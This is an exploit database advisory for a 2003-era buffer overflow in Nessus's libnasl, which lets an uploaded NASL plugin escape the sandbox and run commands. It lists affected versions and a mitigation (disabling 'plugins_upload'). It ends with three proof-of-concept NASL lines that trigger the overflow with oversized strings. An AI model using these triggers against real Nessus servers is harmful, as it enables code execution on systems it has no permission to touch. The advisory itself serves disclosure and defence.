Buffer Overflow in libnasl

vendor:

Nessus

by:

SecurityFocus

8.8

CVSS

HIGH

Buffer Overflow in libnasl

119

CWE

Product Name: Nessus

Affected Version From: Nessus 2.0.7

Affected Version To: Nessus 2.0.7

Patch Exists: YES

Related CWE: CVE-2002-1337

CPE: a:nessus:nessus

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2002

A malicious NASL script can break outside of the established sandbox environment and execute arbitrary commands on the local system. This is possible due to a buffer overflow vulnerability in the 'libnasl' library used by the Nessus application. The malicious script must be a legitimate plugin that has been uploaded to the Nessus server and the affected Nessus application must have enabled the 'plugins_upload' option.

Mitigation:

Disable the 'plugins_upload' option in the Nessus application.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7664/info

Nessus has reported that various flaws have been discovered in the 'libnasl' library used by the Nessus application. As a result, a malicious NASL script may be able to break outside of the established sandbox environment and execute arbitrary commands on the local system.

Note that this malicious script must be a legitimate plugin that has been uploaded to the Nessus server. Furthermore, the affected Nessus application must have enabled the 'plugins_upload' option (which is disabled by default).

insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) );